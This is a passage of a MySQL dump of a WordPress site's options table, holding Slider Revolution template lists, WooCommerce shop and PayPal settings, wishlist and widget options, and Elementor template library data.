3\",\"img\":\"Horoscope-Slider-with-Zodiac-Showcase\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Horoscope-Slider-with-Zodiac-Showcase\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"Horoscope-Slider-with-Zodiac-Showcase\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"Horoscope-Slider-with-Zodiac-Showcase\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"Horoscope-Slider-with-Zodiac-Showcase\\/slide7.jpg\"},{\"title\":\"Slide 8\",\"img\":\"Horoscope-Slider-with-Zodiac-Showcase\\/slide8.jpg\"},{\"title\":\"Slide 9\",\"img\":\"Horoscope-Slider-with-Zodiac-Showcase\\/slide9.jpg\"},{\"title\":\"Slide 10\",\"img\":\"Horoscope-Slider-with-Zodiac-Showcase\\/slide10.jpg\"},{\"title\":\"Slide 11\",\"img\":\"Horoscope-Slider-with-Zodiac-Showcase\\/slide11.jpg\"},{\"title\":\"Slide 12\",\"img\":\"Horoscope-Slider-with-Zodiac-Showcase\\/slide12.jpg\"}],\"Urban-Oven-Pizza-Slider-Template\":[{\"title\":\"Slide 1\",\"img\":\"Urban-Oven-Pizza-Slider-Template\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Urban-Oven-Pizza-Slider-Template\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Urban-Oven-Pizza-Slider-Template\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Urban-Oven-Pizza-Slider-Template\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"Urban-Oven-Pizza-Slider-Template\\/slide5.jpg\"}],\"modern-web-agency-website-template-package\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/Modern-Web-Agency-Website-Template.jpg\"}],\"Modern-Web-Agency-Hero\":[{\"title\":\"Slide 1\",\"img\":\"Modern-Web-Agency-Hero\\/slide1.jpg\"}],\"Modern-Web-Agency-Brands\":[{\"title\":\"Slide 1\",\"img\":\"Modern-Web-Agency-Brands\\/slide1.jpg\"}],\"Modern-Web-Agency-About\":[{\"title\":\"Slide 1\",\"img\":\"Modern-Web-Agency-About\\/slide1.jpg\"}],\"Modern-Web-Agency-Projects\":[{\"title\":\"Slide 1\",\"img\":\"Modern-Web-Agency-Projects\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Modern-Web-Agency-Projects\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Modern-Web-Agency-Projects\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Modern-Web-Agency-Projects\\/slide4.jpg\"}],\"Modern-Web-Agency-Title-Projects\":[{\"title\":\"Slide 1\",\"img\":\"Modern-Web-Agency-Title-Projects\\/slide1.jpg\"}],\"Modern-Web-Agency-Services\":[{\"title\":\"Slide 1\",\"img\":\"Modern-Web-Agency-Services\\/slide1.jpg\"}],\"Modern-Web-Agency-Contact\":[{\"title\":\"Slide 1\",\"img\":\"Modern-Web-Agency-Contact\\/slide1.jpg\"}],\"Modern-Agency-Project-1\":[{\"title\":\"Slide 1\",\"img\":\"Modern-Agency-Project-1\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Modern-Agency-Project-1\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Modern-Agency-Project-1\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Modern-Agency-Project-1\\/slide4.jpg\"}],\"Modern-Agency-Project-2\":[{\"title\":\"Slide 1\",\"img\":\"Modern-Agency-Project-2\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Modern-Agency-Project-2\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Modern-Agency-Project-2\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Modern-Agency-Project-2\\/slide4.jpg\"}],\"Modern-Agency-Project-3\":[{\"title\":\"Slide 1\",\"img\":\"Modern-Agency-Project-3\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Modern-Agency-Project-3\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Modern-Agency-Project-3\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Modern-Agency-Project-3\\/slide4.jpg\"}],\"Modern-Agency-Project-4\":[{\"title\":\"Slide 1\",\"img\":\"Modern-Agency-Project-4\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Modern-Agency-Project-4\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Modern-Agency-Project-4\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Modern-Agency-Project-4\\/slide4.jpg\"}],\"Dog-Shelter-Puppy-Showcase-Slider\":[{\"title\":\"Slide 1\",\"img\":\"Dog-Shelter-Showcase-Slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Dog-Shelter-Showcase-Slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Dog-Shelter-Showcase-Slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Dog-Shelter-Showcase-Slider\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"Dog-Shelter-Showcase-Slider\\/slide5.jpg\"}],\"Velocity-Elegant-Fullscreen-Slider\":[{\"title\":\"Slide 1\",\"img\":\"Velocity-Elegant-Fullscreen-Slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Velocity-Elegant-Fullscreen-Slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Velocity-Elegant-Fullscreen-Slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Velocity-Elegant-Fullscreen-Slider\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"Velocity-Elegant-Fullscreen-Slider\\/slide5.jpg\"}],\"Professional-Training-Slider-Template\":[{\"title\":\"Slide 1\",\"img\":\"Professional-Training-Slider-Template\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Professional-Training-Slider-Template\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Professional-Training-Slider-Template\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Professional-Training-Slider-Template\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"Professional-Training-Slider-Template\\/slide5.jpg\"}],\"Modern-Restaurant-Slider-Design\":[{\"title\":\"Slide 1\",\"img\":\"Modern-Restaurant-Slider-Design\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Modern-Restaurant-Slider-Design\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Modern-Restaurant-Slider-Design\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Modern-Restaurant-Slider-Design\\/slide4.jpg\"}],\"coworking-space-website-template\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/coworking-space-website-template.jpg\"}],\"Coworking-Space-Menu\":[{\"title\":\"Slide 1\",\"img\":\"Coworking-Space-Menu\\/slide1.jpg\"}],\"Coworking-Space-Hero\":[{\"title\":\"Slide 1\",\"img\":\"Coworking-Space-Hero\\/slide1.jpg\"}],\"Coworking-Space-Counter\":[{\"title\":\"Slide 1\",\"img\":\"Coworking-Space-Counter\\/slide1.jpg\"}],\"Coworking-Space-Why-Choose\":[{\"title\":\"Slide 1\",\"img\":\"Coworking-Space-Why-Choose\\/slide1.jpg\"}],\"Coworking-Space-Amenities\":[{\"title\":\"Slide 1\",\"img\":\"Coworking-Space-Amenities\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Coworking-Space-Amenities\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Coworking-Space-Amenities\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Coworking-Space-Amenities\\/slide4.jpg\"}],\"Coworking-Space-Plans\":[{\"title\":\"Slide 1\",\"img\":\"Coworking-Space-Plans\\/slide1.jpg\"}],\"Coworking-Space-Testimonials\":[{\"title\":\"Slide 1\",\"img\":\"Coworking-Space-Testimonials\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Coworking-Space-Testimonials\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Coworking-Space-Testimonials\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Coworking-Space-Testimonials\\/slide4.jpg\"}],\"Coworking-Space-Join\":[{\"title\":\"Slide 1\",\"img\":\"Coworking-Space-Join\\/slide1.jpg\"}],\"Coworking-Space-Footer\":[{\"title\":\"Slide 1\",\"img\":\"Coworking-Space-Footer\\/slide1.jpg\"}]}}','no');
INSERT INTO `wpev_options` VALUES (232,'rs-templates-counter','0','no'),(233,'revslider_table_version','1.0.12','yes'),(236,'action_scheduler_hybrid_store_demarkation','11','yes'),(237,'schema-ActionScheduler_StoreSchema','6.0.1668396505','yes'),(238,'schema-ActionScheduler_LoggerSchema','3.0.1668396505','yes'),(241,'woocommerce_schema_version','430','yes'),(242,'woocommerce_store_address','','yes'),(243,'woocommerce_store_address_2','','yes'),(244,'woocommerce_store_city','','yes'),(245,'woocommerce_default_country','US:CA','yes'),(246,'woocommerce_store_postcode','','yes'),(247,'woocommerce_allowed_countries','all','yes'),(248,'woocommerce_all_except_countries','','yes'),(249,'woocommerce_specific_allowed_countries','','yes'),(250,'woocommerce_ship_to_countries','','yes'),(251,'woocommerce_specific_ship_to_countries','','yes'),(252,'woocommerce_default_customer_address','base','yes'),(253,'woocommerce_calc_taxes','no','yes'),(254,'woocommerce_enable_coupons','yes','yes'),(255,'woocommerce_calc_discounts_sequentially','no','no'),(256,'woocommerce_currency','USD','yes'),(257,'woocommerce_currency_pos','left','yes'),(258,'woocommerce_price_thousand_sep',',','yes'),(259,'woocommerce_price_decimal_sep','.','yes'),(260,'woocommerce_price_num_decimals','2','yes'),(261,'woocommerce_shop_page_id','12','yes'),(262,'woocommerce_cart_redirect_after_add','no','yes'),(263,'woocommerce_enable_ajax_add_to_cart','yes','yes'),(264,'woocommerce_placeholder_image','11','yes'),(265,'woocommerce_weight_unit','kg','yes'),(266,'woocommerce_dimension_unit','cm','yes'),(267,'woocommerce_enable_reviews','yes','yes'),(268,'woocommerce_review_rating_verification_label','yes','no'),(269,'woocommerce_review_rating_verification_required','no','no'),(270,'woocommerce_enable_review_rating','yes','yes'),(271,'woocommerce_review_rating_required','yes','no'),(272,'woocommerce_manage_stock','yes','yes'),(273,'woocommerce_hold_stock_minutes','60','no'),(274,'woocommerce_notify_low_stock','yes','no'),(275,'woocommerce_notify_no_stock','yes','no'),(276,'woocommerce_stock_email_recipient','ardy@futuremediatrix.com','no'),(277,'woocommerce_notify_low_stock_amount','2','no'),(278,'woocommerce_notify_no_stock_amount','0','yes'),(279,'woocommerce_hide_out_of_stock_items','no','yes'),(280,'woocommerce_stock_format','','yes'),(281,'woocommerce_file_download_method','force','no'),(282,'woocommerce_downloads_redirect_fallback_allowed','no','no'),(283,'woocommerce_downloads_require_login','no','no'),(284,'woocommerce_downloads_grant_access_after_payment','yes','no'),(285,'woocommerce_downloads_deliver_inline','','no'),(286,'woocommerce_downloads_add_hash_to_filename','yes','yes'),(287,'woocommerce_attribute_lookup_enabled','no','yes'),(288,'woocommerce_attribute_lookup_direct_updates','no','yes'),(289,'woocommerce_prices_include_tax','no','yes'),(290,'woocommerce_tax_based_on','shipping','yes'),(291,'woocommerce_shipping_tax_class','inherit','yes'),(292,'woocommerce_tax_round_at_subtotal','no','yes'),(293,'woocommerce_tax_classes','','yes'),(294,'woocommerce_tax_display_shop','excl','yes'),(295,'woocommerce_tax_display_cart','excl','yes'),(296,'woocommerce_price_display_suffix','','yes'),(297,'woocommerce_tax_total_display','itemized','no'),(298,'woocommerce_enable_shipping_calc','yes','no'),(299,'woocommerce_shipping_cost_requires_address','no','yes'),(300,'woocommerce_ship_to_destination','billing','no'),(301,'woocommerce_shipping_debug_mode','no','yes'),(302,'woocommerce_enable_guest_checkout','yes','no'),(303,'woocommerce_enable_checkout_login_reminder','no','no'),(304,'woocommerce_enable_signup_and_login_from_checkout','no','no'),(305,'woocommerce_enable_myaccount_registration','no','no'),(306,'woocommerce_registration_generate_username','yes','no'),(307,'woocommerce_registration_generate_password','yes','no'),(308,'woocommerce_erasure_request_removes_order_data','no','no'),(309,'woocommerce_erasure_request_removes_download_data','no','no'),(310,'woocommerce_allow_bulk_remove_personal_data','no','no'),(311,'woocommerce_registration_privacy_policy_text','Your personal data will be used to support your experience throughout this website, to manage access to your account, and for other purposes described in our [privacy_policy].','yes'),(312,'woocommerce_checkout_privacy_policy_text','Your personal data will be used to process your order, support your experience throughout this website, and for other purposes described in our [privacy_policy].','yes'),(313,'woocommerce_delete_inactive_accounts','a:2:{s:6:\"number\";s:0:\"\";s:4:\"unit\";s:6:\"months\";}','no'),(314,'woocommerce_trash_pending_orders','','no'),(315,'woocommerce_trash_failed_orders','','no'),(316,'woocommerce_trash_cancelled_orders','','no'),(317,'woocommerce_anonymize_completed_orders','a:2:{s:6:\"number\";s:0:\"\";s:4:\"unit\";s:6:\"months\";}','no'),(318,'woocommerce_email_from_name','My Blog','no'),(319,'woocommerce_email_from_address','ardy@futuremediatrix.com','no'),(320,'woocommerce_email_header_image','','no'),(321,'woocommerce_email_footer_text','{site_title} &mdash; Built with {WooCommerce}','no'),(322,'woocommerce_email_base_color','#7f54b3','no'),(323,'woocommerce_email_background_color','#f7f7f7','no'),(324,'woocommerce_email_body_background_color','#ffffff','no'),(325,'woocommerce_email_text_color','#3c3c3c','no'),(326,'woocommerce_merchant_email_notifications','no','no'),(327,'woocommerce_cart_page_id','13','no'),(328,'woocommerce_checkout_page_id','14','no'),(329,'woocommerce_myaccount_page_id','15','no'),(330,'woocommerce_terms_page_id','3388','yes'),(331,'woocommerce_checkout_pay_endpoint','order-pay','yes'),(332,'woocommerce_checkout_order_received_endpoint','order-received','yes'),(333,'woocommerce_myaccount_add_payment_method_endpoint','add-payment-method','yes'),(334,'woocommerce_myaccount_delete_payment_method_endpoint','delete-payment-method','yes'),(335,'woocommerce_myaccount_set_default_payment_method_endpoint','set-default-payment-method','yes'),(336,'woocommerce_myaccount_orders_endpoint','orders','yes'),(337,'woocommerce_myaccount_view_order_endpoint','view-order','yes'),(338,'woocommerce_myaccount_downloads_endpoint','downloads','yes'),(339,'woocommerce_myaccount_edit_account_endpoint','edit-account','yes'),(340,'woocommerce_myaccount_edit_address_endpoint','edit-address','yes'),(341,'woocommerce_myaccount_payment_methods_endpoint','payment-methods','yes'),(342,'woocommerce_myaccount_lost_password_endpoint','lost-password','yes'),(343,'woocommerce_logout_endpoint','customer-logout','yes'),(344,'woocommerce_api_enabled','no','yes'),(345,'woocommerce_allow_tracking','no','no'),(346,'woocommerce_show_marketplace_suggestions','yes','no'),(347,'woocommerce_analytics_enabled','yes','yes'),(348,'woocommerce_navigation_enabled','no','yes'),(349,'woocommerce_feature_custom_order_tables_enabled','no','yes'),(350,'woocommerce_single_image_width','600','yes'),(351,'woocommerce_thumbnail_image_width','300','yes'),(352,'woocommerce_checkout_highlight_required_fields','yes','yes'),(353,'woocommerce_demo_store','no','no'),(354,'wc_downloads_approved_directories_mode','enabled','yes'),(355,'woocommerce_permalinks','a:5:{s:12:\"product_base\";s:7:\"product\";s:13:\"category_base\";s:16:\"product-category\";s:8:\"tag_base\";s:11:\"product-tag\";s:14:\"attribute_base\";s:0:\"\";s:22:\"use_verbose_page_rules\";b:0;}','yes'),(356,'current_theme_supports_woocommerce','yes','yes'),(357,'woocommerce_queue_flush_rewrite_rules','no','yes'),(358,'_transient_wc_attribute_taxonomies','a:0:{}','yes'),(360,'default_product_cat','23','yes'),(362,'woocommerce_refund_returns_page_id','16','yes'),(365,'woocommerce_paypal_settings','a:23:{s:7:\"enabled\";s:2:\"no\";s:5:\"title\";s:6:\"PayPal\";s:11:\"description\";s:85:\"Pay via PayPal; you can pay with your credit card if you don\'t have a PayPal account.\";s:5:\"email\";s:24:\"ardy@futuremediatrix.com\";s:8:\"advanced\";s:0:\"\";s:8:\"testmode\";s:2:\"no\";s:5:\"debug\";s:2:\"no\";s:16:\"ipn_notification\";s:3:\"yes\";s:14:\"receiver_email\";s:24:\"ardy@futuremediatrix.com\";s:14:\"identity_token\";s:0:\"\";s:14:\"invoice_prefix\";s:3:\"WC-\";s:13:\"send_shipping\";s:3:\"yes\";s:16:\"address_override\";s:2:\"no\";s:13:\"paymentaction\";s:4:\"sale\";s:9:\"image_url\";s:0:\"\";s:11:\"api_details\";s:0:\"\";s:12:\"api_username\";s:0:\"\";s:12:\"api_password\";s:0:\"\";s:13:\"api_signature\";s:0:\"\";s:20:\"sandbox_api_username\";s:0:\"\";s:20:\"sandbox_api_password\";s:0:\"\";s:21:\"sandbox_api_signature\";s:0:\"\";s:12:\"_should_load\";s:2:\"no\";}','yes'),(366,'woocommerce_version','7.1.0','yes'),(367,'woocommerce_db_version','7.1.0','yes'),(368,'woocommerce_admin_install_timestamp','1668396507','yes'),(369,'woocommerce_inbox_variant_assignment','3','yes'),(373,'yit_recently_activated','a:1:{i:0;s:34:\"yith-woocommerce-wishlist/init.php\";}','yes'),(374,'_transient_jetpack_autoloader_plugin_paths','a:0:{}','yes'),(375,'action_scheduler_lock_async-request-runner','1668397261','yes'),(376,'woocommerce_admin_notices','a:0:{}','yes'),(377,'revslider_update_version','6.4.10','yes'),(378,'elementor_version','3.8.1','yes'),(379,'elementor_install_history','a:1:{s:5:\"3.8.1\";i:1668399321;}','yes'),(380,'elementor_events_db_version','1.0.0','no'),(381,'woocommerce_maxmind_geolocation_settings','a:1:{s:15:\"database_prefix\";s:32:\"vYcoBdAGXw22KXcHTFqO3yfeG92x0E6W\";}','yes'),(382,'_transient_woocommerce_webhook_ids_status_active','a:0:{}','yes'),(383,'widget_recent-posts-widget-with-thumbnails','a:2:{i:1;a:41:{s:5:\"title\";s:12:\"Latest posts\";s:11:\"default_url\";s:106:\"https://demo.ovatheme.com/retirio/wp-content/plugins/recent-posts-widget-with-thumbnails/default_thumb.gif\";s:16:\"thumb_dimensions\";s:6:\"custom\";s:12:\"category_ids\";a:1:{i:0;i:0;}s:7:\"orderby\";s:4:\"date\";s:5:\"order\";s:4:\"desc\";s:14:\"excerpt_length\";i:55;s:12:\"number_posts\";i:3;s:17:\"post_title_length\";i:1000;s:12:\"thumb_height\";i:75;s:11:\"thumb_width\";i:75;s:17:\"hide_current_post\";b:0;s:17:\"only_sticky_posts\";b:0;s:17:\"hide_sticky_posts\";b:0;s:10:\"hide_title\";b:0;s:17:\"keep_aspect_ratio\";b:0;s:11:\"keep_sticky\";b:0;s:12:\"only_1st_img\";b:0;s:12:\"random_order\";b:0;s:11:\"show_author\";b:0;s:15:\"show_categories\";b:0;s:20:\"show_comments_number\";b:0;s:9:\"show_date\";b:1;s:12:\"show_excerpt\";b:0;s:14:\"ignore_excerpt\";b:0;s:27:\"ignore_post_content_excerpt\";b:0;s:16:\"set_more_as_link\";b:0;s:11:\"try_1st_img\";b:0;s:11:\"use_default\";b:0;s:16:\"use_default_only\";b:0;s:15:\"open_new_window\";b:0;s:21:\"print_post_categories\";b:0;s:17:\"set_cats_as_links\";b:0;s:14:\"use_inline_css\";b:0;s:10:\"use_no_css\";b:0;s:14:\"hide_alt_texts\";b:0;s:10:\"show_thumb\";b:1;s:12:\"author_label\";s:2:\"By\";s:12:\"excerpt_more\";s:6:\" […]\";s:14:\"category_label\";s:2:\"In\";s:9:\"thumb_alt\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(384,'widget_rev-slider-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(385,'widget_woocommerce_widget_cart','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(386,'widget_woocommerce_layered_nav_filters','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(387,'widget_woocommerce_layered_nav','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(388,'widget_woocommerce_price_filter','a:2:{i:1;a:1:{s:5:\"title\";s:5:\"Price\";}s:12:\"_multiwidget\";i:1;}','yes'),(389,'widget_woocommerce_product_categories','a:2:{i:1;a:8:{s:5:\"title\";s:10:\"Categories\";s:7:\"orderby\";s:4:\"name\";s:8:\"dropdown\";i:0;s:5:\"count\";i:0;s:12:\"hierarchical\";i:1;s:18:\"show_children_only\";i:0;s:10:\"hide_empty\";i:1;s:9:\"max_depth\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(390,'widget_woocommerce_product_search','a:2:{i:1;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(391,'widget_woocommerce_product_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(392,'widget_woocommerce_products','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(393,'widget_woocommerce_recently_viewed_products','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(394,'widget_woocommerce_top_rated_products','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(395,'widget_woocommerce_recent_reviews','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(396,'widget_woocommerce_rating_filter','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(397,'widget_mc4wp_form_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(400,'yith_wcwl_wishlist_page_id','17','yes'),(401,'yith_wcwl_version','3.14.0','yes'),(402,'yith_wcwl_db_version','3.0.0','yes'),(407,'wc_remote_inbox_notifications_stored_state','O:8:\"stdClass\":2:{s:22:\"there_were_no_products\";b:1;s:22:\"there_are_now_products\";b:1;}','no'),(409,'rs_cache_overlay','6.5.25','yes'),(410,'wc_blocks_db_schema_version','260','yes'),(419,'_transient_woocommerce_shipping_task_zone_count_transient','0','yes'),(420,'mc4wp_version','4.8.11','yes'),(426,'elementor_onboarded','1','yes'),(429,'yith_wcwl_ajax_enable','no','yes'),(430,'yith_wcwl_after_add_to_wishlist_behaviour','view','yes'),(431,'yith_wcwl_show_on_loop','no','yes'),(432,'yith_wcwl_loop_position','after_add_to_cart','yes'),(433,'yith_wcwl_button_position','after_add_to_cart','yes'),(434,'yith_wcwl_add_to_wishlist_text','Add to wishlist','yes'),(435,'yith_wcwl_product_added_text','Product added!','yes'),(436,'yith_wcwl_browse_wishlist_text','Browse wishlist','yes'),(437,'yith_wcwl_already_in_wishlist_text','The product is already in your wishlist!','yes'),(438,'yith_wcwl_add_to_wishlist_style','link','yes'),(439,'yith_wcwl_rounded_corners_radius','16','yes'),(440,'yith_wcwl_add_to_wishlist_icon','fa-heart-o','yes'),(441,'yith_wcwl_add_to_wishlist_custom_icon','','yes'),(442,'yith_wcwl_added_to_wishlist_icon','fa-heart','yes'),(443,'yith_wcwl_added_to_wishlist_custom_icon','','yes'),(444,'yith_wcwl_custom_css','','yes'),(445,'yith_wcwl_variation_show','','yes'),(446,'yith_wcwl_price_show','yes','yes'),(447,'yith_wcwl_stock_show','yes','yes'),(448,'yith_wcwl_show_dateadded','','yes'),(449,'yith_wcwl_add_to_cart_show','yes','yes'),(450,'yith_wcwl_show_remove','yes','yes'),(451,'yith_wcwl_repeat_remove_button','','yes'),(452,'yith_wcwl_redirect_cart','no','yes'),(453,'yith_wcwl_remove_after_add_to_cart','yes','yes'),(454,'yith_wcwl_enable_share','yes','yes'),(455,'yith_wcwl_share_fb','yes','yes'),(456,'yith_wcwl_share_twitter','yes','yes'),(457,'yith_wcwl_share_pinterest','yes','yes'),(458,'yith_wcwl_share_email','yes','yes'),(459,'yith_wcwl_share_whatsapp','yes','yes'),(460,'yith_wcwl_share_url','no','yes'),(461,'yith_wcwl_socials_title','My wishlist on My Blog','yes'),(462,'yith_wcwl_socials_text','','yes'),(463,'yith_wcwl_socials_image_url','','yes'),(464,'yith_wcwl_wishlist_title','My wishlist','yes'),(465,'yith_wcwl_add_to_cart_text','Add to cart','yes'),(466,'yith_wcwl_add_to_cart_style','link','yes'),(467,'yith_wcwl_add_to_cart_rounded_corners_radius','16','yes'),(468,'yith_wcwl_add_to_cart_icon','fa-shopping-cart','yes'),(469,'yith_wcwl_add_to_cart_custom_icon','','yes'),(470,'yith_wcwl_color_headers_background','#F4F4F4','yes'),(471,'yith_wcwl_fb_button_icon','fa-facebook','yes'),(472,'yith_wcwl_fb_button_custom_icon','','yes'),(473,'yith_wcwl_tw_button_icon','fa-twitter','yes'),(474,'yith_wcwl_tw_button_custom_icon','','yes'),(475,'yith_wcwl_pr_button_icon','fa-pinterest','yes'),(476,'yith_wcwl_pr_button_custom_icon','','yes'),(477,'yith_wcwl_em_button_icon','fa-envelope-o','yes'),(478,'yith_wcwl_em_button_custom_icon','','yes'),(479,'yith_wcwl_wa_button_icon','fa-whatsapp','yes'),(480,'yith_wcwl_wa_button_custom_icon','','yes'),(481,'yit_plugin_fw_panel_wc_default_options_set','a:1:{s:15:\"yith_wcwl_panel\";b:1;}','yes'),(482,'_elementor_installed_time','1668396525','yes'),(483,'elementor_remote_info_library','a:3:{s:10:\"types_data\";a:4:{s:5:\"block\";a:2:{s:10:\"categories\";a:27:{i:0;s:8:\"404 page\";i:1;s:5:\"about\";i:2;s:7:\"archive\";i:3;s:8:\"Benefits\";i:4;s:14:\"call to action\";i:5;s:7:\"clients\";i:6;s:7:\"contact\";i:7;s:4:\"Data\";i:8;s:3:\"faq\";i:9;s:8:\"features\";i:10;s:6:\"footer\";i:11;s:7:\"Gallery\";i:12;s:6:\"header\";i:13;s:4:\"hero\";i:14;s:9:\"portfolio\";i:15;s:7:\"pricing\";i:16;s:15:\"product archive\";i:17;s:5:\"Quote\";i:18;s:15:\"Service Details\";i:19;s:8:\"services\";i:20;s:11:\"single page\";i:21;s:11:\"single post\";i:22;s:14:\"single product\";i:23;s:5:\"stats\";i:24;s:9:\"subscribe\";i:25;s:4:\"team\";i:26;s:12:\"testimonials\";}s:4:\"sets\";a:5:{i:0;s:11:\"Boxing Club\";i:1;s:19:\"Business Consultant\";i:2;s:16:\"Marketing Agency\";i:3;s:9:\"Wireframe\";i:4;s:15:\"Workshop Center\";}}s:5:\"popup\";a:1:{s:10:\"categories\";a:6:{i:0;s:10:\"bottom bar\";i:1;s:7:\"classic\";i:2;s:6:\"fly-in\";i:3;s:11:\"full screen\";i:4;s:9:\"hello bar\";i:5;s:8:\"slide-in\";}}s:2:\"lp\";a:1:{s:10:\"categories\";a:15:{i:0;s:8:\"Business\";i:1;s:16:\"Coming Soon Page\";i:2;s:9:\"eCommerce\";i:3;s:9:\"Education\";i:4;s:6:\"Events\";i:5;s:18:\"Health and Fitness\";i:6;s:3:\"NFT\";i:7;s:14:\"Online Service\";i:8;s:7:\"Product\";i:9;s:11:\"Real Estate\";i:10;s:18:\"Social Involvement\";i:11;s:14:\"Thank You Page\";i:12;s:6:\"Travel\";i:13;s:18:\"Under Construction\";i:14;s:9:\"Wireframe\";}}s:2:\"lb\";a:1:{s:10:\"categories\";a:2:{i:0;s:4:\"post\";i:1;s:7:\"product\";}}}s:10:\"categories\";a:27:{i:0;s:8:\"404 page\";i:1;s:5:\"about\";i:2;s:7:\"archive\";i:3;s:8:\"Benefits\";i:4;s:14:\"call to action\";i:5;s:7:\"clients\";i:6;s:7:\"contact\";i:7;s:4:\"Data\";i:8;s:3:\"faq\";i:9;s:8:\"features\";i:10;s:6:\"footer\";i:11;s:7:\"Gallery\";i:12;s:6:\"header\";i:13;s:4:\"hero\";i:14;s:9:\"portfolio\";i:15;s:7:\"pricing\";i:16;s:15:\"product archive\";i:17;s:5:\"Quote\";i:18;s:15:\"Service Details\";i:19;s:8:\"services\";i:20;s:11:\"single page\";i:21;s:11:\"single post\";i:22;s:14:\"single product\";i:23;s:5:\"stats\";i:24;s:9:\"subscribe\";i:25;s:4:\"team\";i:26;s:12:\"testimonials\";}s:9:\"templates\";a:823:{i:0;a:19:{s:4:\"tmpl\";i:1280;s:2:\"id\";i:22403;s:5:\"title\";s:40:\"Hello Bar | Subscribe | Aesthetic Clinic\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/aesthetic-clinic-19.jpg\";s:12:\"tmpl_created\";i:1647354307;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/hello-bar-subscribe-aesthetic-clinic/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:48:\"[\"Barbershop\",\"Business\",\"Discount\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:1;a:19:{s:4:\"tmpl\";i:1281;s:2:\"id\";i:22410;s:5:\"title\";s:32:\"Fly-In | Discount | Hair 